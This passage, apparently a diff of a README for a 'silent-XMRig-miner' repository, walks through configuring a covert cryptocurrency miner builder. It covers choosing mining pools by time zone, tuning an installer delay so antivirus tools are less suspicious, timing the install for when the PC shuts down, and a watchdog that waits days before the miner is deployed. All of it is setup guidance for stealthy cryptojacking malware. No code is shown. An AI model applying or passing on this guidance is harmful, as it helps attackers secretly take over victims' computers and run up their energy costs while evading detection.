operationalguy/silent-XMRig-miner/README.md

     2. Zone 2 - from "UTC -6" to "UTC -3" (America east pools)
     3. Zone 3 - from "UTC -2" to "UTC +4" (Europe pools)
     4. Zone 4 - from "UTC +5" to "UTC +12" (Asia pools)
 3. Change "Installer delay" if needed.
 Lower time - more prone to AVs suspicion.
-Bigger time - PC can be turned off before anything is installed
+If both set to 0, waits infinite time and installs when PC is turning off
 4. Change "Delay before deploy miner" if needed.
 It is time(days) watchdog will wait before deploying silent-XMRig-miner and starting mining operation
 5. Skip checkboxes, as they are configured the best way.
 "Add heavy calculation delay" is not recomended as it can crush the installer
 6. Change "Minimum RAM for light mode" if needed, it is minimum RAM before applying "light" mode